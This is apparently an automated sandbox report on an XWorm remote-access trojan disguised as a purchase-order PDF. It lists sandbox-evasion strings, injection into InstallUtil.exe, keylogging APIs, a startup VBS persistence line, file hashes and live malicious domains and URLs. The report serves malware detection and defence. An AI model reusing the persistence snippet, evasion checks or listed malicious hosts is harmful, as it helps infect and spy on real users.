                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: PO#8329837372938383839238PDF.exe PID: 2104, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeMemory allocated: 3130000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeMemory allocated: 3380000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeMemory allocated: 3130000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 9B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 26A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 46A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeWindow / User API: threadDelayed 7448Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeWindow / User API: threadDelayed 1173Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe TID: 4032Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe TID: 4032Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe TID: 6448Thread sleep count: 7448 > 30Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe TID: 6448Thread sleep count: 1173 > 30Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe TID: 4032Thread sleep time: -99873s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe TID: 4032Thread sleep time: -99765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe TID: 4032Thread sleep time: -99656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe TID: 4032Thread sleep time: -99547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe TID: 4032Thread sleep time: -99437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe TID: 4032Thread sleep time: -99984s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeThread delayed: delay time: 99873Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeThread delayed: delay time: 99765Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeThread delayed: delay time: 99656Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeThread delayed: delay time: 99547Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeThread delayed: delay time: 99437Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeThread delayed: delay time: 99984Jump to behavior
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2260131036.0000000007140000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: fhgfSaWT2Kdbr9biVcT
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                Source: PO#8329837372938383839238PDF.exe, 00000000.00000002.2236686816.00000000015C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: 0.2.PO#8329837372938383839238PDF.exe.468ed70.6.raw.unpack, NativeMethods.csReference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
                Source: 0.2.PO#8329837372938383839238PDF.exe.468ed70.6.raw.unpack, ResourceReferenceValue.csReference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
                Source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, XLogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeQueries volume information: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO#8329837372938383839238PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected XWorm
                Source: Yara matchFile source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.InstallUtil.exe.730000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3396289534.0000000000732000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PO#8329837372938383839238PDF.exe PID: 2104, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4140, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected XWorm
                Source: Yara matchFile source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.InstallUtil.exe.730000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO#8329837372938383839238PDF.exe.38405b8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3396289534.0000000000732000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PO#8329837372938383839238PDF.exe PID: 2104, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4140, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts1
                Scheduled Task/Job                		1
                Scripting                		11
                Process Injection                		1
                Masquerading                		1
                Input Capture                		211
                Security Software Discovery                		Remote Services1
                Input Capture                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API                		1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Registry Run Keys / Startup Folder                		2
                Registry Run Keys / Startup Folder                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture13
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets13
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Software Packing                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PO#8329837372938383839238PDF.exe33%VirustotalBrowse
                PO#8329837372938383839238PDF.exe18%ReversingLabsWin32.Trojan.Leonem
                PO#8329837372938383839238PDF.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\SupportsDynamicPartitions.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\SupportsDynamicPartitions.exe18%ReversingLabsWin32.Trojan.Leonem

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                sierrassinfinusadas.com.ar0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://sierrassinfinusadas.com.ar/rindasq/Karjsfww.vdf0%Avira URL Cloudsafe
                https://sierrassinfinusadas.com.ar0%Avira URL Cloudsafe
                nwamama.ydns.eu100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                sierrassinfinusadas.com.ar
                		167.250.5.91
                		truefalseunknown
                ax-0001.ax-msedge.net
                		150.171.27.10
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  nwamama.ydns.eutrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://sierrassinfinusadas.com.ar/rindasq/Karjsfww.vdffalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://github.com/mgravell/protobuf-netPO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://github.com/mgravell/protobuf-netiPO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://stackoverflow.com/q/14436606/23354PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/mgravell/protobuf-netJPO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://sierrassinfinusadas.com.arPO#8329837372938383839238PDF.exe, 00000000.00000002.2237773509.00000000034AD000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2237773509.0000000003381000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO#8329837372938383839238PDF.exe, 00000000.00000002.2237773509.0000000003381000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://stackoverflow.com/q/11564914/23354;PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://stackoverflow.com/q/2152978/23354PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2261142304.0000000007400000.00000004.08000000.00040000.00000000.sdmp, PO#8329837372938383839238PDF.exe, 00000000.00000002.2256839554.0000000004590000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                167.250.5.91
                                		sierrassinfinusadas.com.arArgentina
                                		264649NUTHOSTSRLARfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1559973
                                Start date and time:2024-11-21 08:57:06 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 49s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:17
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:PO#8329837372938383839238PDF.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.expl.evad.winEXE@4/3@2/1
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 86%
                                • Number of executed functions: 59
                                • Number of non-executed functions: 6
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net
                                • Execution Graph export aborted for target InstallUtil.exe, PID 4140 because it is empty
                                • Execution Graph export aborted for target PO#8329837372938383839238PDF.exe, PID 2104 because it is empty
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                02:57:58API Interceptor83x Sleep call for process: PO#8329837372938383839238PDF.exe modified
                                08:58:09AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SupportsDynamicPartitions.vbs

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                167.250.5.91SecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  EQ_AW24 New Order Request.xlx.exeGet hashmaliciousGuLoader, StormKitty, XWormBrowse
                                    PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousGuLoaderBrowse
                                      PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousAzorult, GuLoaderBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ax-0001.ax-msedge.netfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                        • 150.171.27.10
                                        https://app.scalenut.com/creator/991c897c-dcc2-43e6-ba55-339c0f6812c2/kj8jd9r9doGet hashmaliciousUnknownBrowse
                                        • 150.171.27.10
                                        9WxT6ygDHJ.exeGet hashmaliciousUnknownBrowse
                                        • 150.171.27.10
                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                        • 150.171.27.10
                                        AaronGiles(1).exeGet hashmaliciousPureCrypterBrowse
                                        • 150.171.28.10
                                        https://c9amf220.caspio.com/dp/3ba5e0002add93b7ba4f4d22b51dGet hashmaliciousUnknownBrowse
                                        • 150.171.28.10
                                        https://atpscan.global.hornetsecurity.com/?d=zgarMAzqF8gJdiyz7BRUZX8-Kt1RoHrhrMmKtaU9kW8&f=VhLn9tqiibnSyqWDnEopjApZtye8WgAc5bwx7BMFWiKwqjA1EcPjZyfvoQy11klP&i=&k=QQhP&m=0jL9ajZ_jxYnMJb2yb4luNRYQCXy24RTS6RPwUyZoAcuBVX0kzGA69aOJSo0d2htwIsi238bOVH3h3HqrhJGfzTuFk7GTjJWYsgIrocXphf5x2p4nZ7S2EABjAck31fG&n=TU5FjsulXTMv8aeSlx257utLr9bUpfdm0dDB4GNEHfOuhOvtIOr62mZHw3PXGZeG&r=qntyoaxGftDLRu_wopiK2t_EdeZaeg9mP15ZZI-qDen_3s7cQ10pAlhKQQnYAIUX&s=c4a8f5ec353e41b8b414bdcf47b33dd5d6b52b0394e0e4a09cc54527f49761c3&u=https%3A%2F%2Fthe1oomisagency.com%2Fthyu%2FGet hashmaliciousUnknownBrowse
                                        • 150.171.28.10
                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                        • 150.171.27.10
                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                        • 150.171.28.10
                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                        • 150.171.27.10
                                        sierrassinfinusadas.com.arSecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        • 167.250.5.91
                                        EQ_AW24 New Order Request.xlx.exeGet hashmaliciousGuLoader, StormKitty, XWormBrowse
                                        • 167.250.5.91
                                        PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousGuLoaderBrowse
                                        • 167.250.5.91
                                        PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                        • 167.250.5.91

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        NUTHOSTSRLARSecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        • 167.250.5.91
                                        EQ_AW24 New Order Request.xlx.exeGet hashmaliciousGuLoader, StormKitty, XWormBrowse
                                        • 167.250.5.91
                                        PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousGuLoaderBrowse
                                        • 167.250.5.91
                                        PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                        • 167.250.5.91
                                        https://audiovoice-message.idc-builder.com/Get hashmaliciousUnknownBrowse
                                        • 167.250.5.7
                                        https://reportesud.com/conceal/nuns/426176721460/bWFya2V0aW5nQHN0b3Jtc2hpZWxkLmV1Get hashmaliciousHTMLPhisherBrowse
                                        • 167.250.5.19
                                        https://reportesud.comGet hashmaliciousUnknownBrowse
                                        • 167.250.5.19
                                        https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&url=amp%2F%E2%80%8Bfin%C2%ADcaa%C2%ADin%C2%ADa%C2%AD%C2%AD.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FUa51gHNn5MTLdsCceMMGWdci/ZmVydGlsaXplckBjZGZhLmNhLmdvdg==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                        • 167.250.5.35
                                        https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&url=amp%2F%E2%80%8Bfin%C2%ADcaa%C2%ADin%C2%ADa%C2%AD%C2%AD.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FUa51gHNn5MTLdsCceMMGWdci/ZmVydGlsaXplckBjZGZhLmNhLmdvdg==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                        • 167.250.5.35
                                        https://t.ly/KJlvlGet hashmaliciousUnknownBrowse
                                        • 167.250.5.39

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousLummaCBrowse
                                        • 167.250.5.91
                                        https://ollama.com/Get hashmaliciousUnknownBrowse
                                        • 167.250.5.91
                                        z1Tender_procurement_product_order__21_11_2024_.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 167.250.5.91
                                        ArchivoNuevo.msiGet hashmaliciousUnknownBrowse
                                        • 167.250.5.91
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 167.250.5.91
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • 167.250.5.91
                                        https://tally.so/widgets/embed.jsGet hashmaliciousUnknownBrowse
                                        • 167.250.5.91
                                        Lreticupdwy.exeGet hashmaliciousUnknownBrowse
                                        • 167.250.5.91
                                        Lreticupdwy.exeGet hashmaliciousUnknownBrowse
                                        • 167.250.5.91
                                        https://www.cbirc.gov.cn/cn/view/pages/index/index.htmlGet hashmaliciousUnknownBrowse
                                        • 167.250.5.91

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SupportsDynamicPartitions.vbs

                                        Download File
                                        Process:C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):103
                                        Entropy (8bit):4.714183086619024
                                        Encrypted:false
                                        SSDEEP:3:FER/n0eFHHoN+EaKC5lSwh6EIV+qAHn:FER/lFHIN7aZ5lrvxqi
                                        MD5:597F8CD6DA9872C3809C52B95BC2C727
                                        SHA1:8715387A02D1B4DE4A8FC9D3DD3FE352EDCF0143
                                        SHA-256:90D46E3DDACC577BD2E747FEBC1D21A971F9FFF0387612B97903E5136165CC55
                                        SHA-512:25A954B17B47206D1F5AB6031FADD12010E8A878C1C4F1EFE67BA631E09428A2CA8C2EBEF346FF0FF596CB0F0E390EC6BED5AB1F9952F4434E2B6467DE62C8BF
                                        Malicious:true
                                        Reputation:low
                                        Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\SupportsDynamicPartitions.exe"""

                                        C:\Users\user\AppData\Roaming\SupportsDynamicPartitions.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):181760
                                        Entropy (8bit):5.5039704490014545
                                        Encrypted:false
                                        SSDEEP:3072:jvXdvpzRm9npGJyJObSGOOs3KI/ZMQRoGaHn2J:jvXdvpzRmzm/bSGOOs3KI/GQI
                                        MD5:BA88DCA6E9D0A6F55A8ADDC30B02D988
                                        SHA1:F48B8D8255A9192675DDE74EF7DB412FCB528792
                                        SHA-256:B15E57DF1AB1FC902337D52F633267B802CCEE6F37BA21CA065AE14380817081
                                        SHA-512:F10C077BB1AA2C0C32CE0DC03A0B3E27F838B98C1251D7540D2D81E7C3B13EE45CFCB79BE085EA83DD12EE9EB0613A1FC116F9283236379FDF85320199A6E2C3
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 18%
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....h>g............................N.... ........@.. ....................... ............`.....................................K.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H........................................................................*...(....*...(....*.s....(....*.0../.........(....}.......}......|......(...+..|....(....*...(....*.0.......... ........8........E....o...-...T...........8j...*.{...... ....~Q...{]...9....& ....8.......}.... ....~Q...{....:....& ....8.......9f... ........8........E........................*.......Z...........n...1...8.....|.......... ........8.....{...... ....8......%..}.... ....~Q...{r...9|...& ....8q...

                                        C:\Users\user\AppData\Roaming\SupportsDynamicPartitions.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
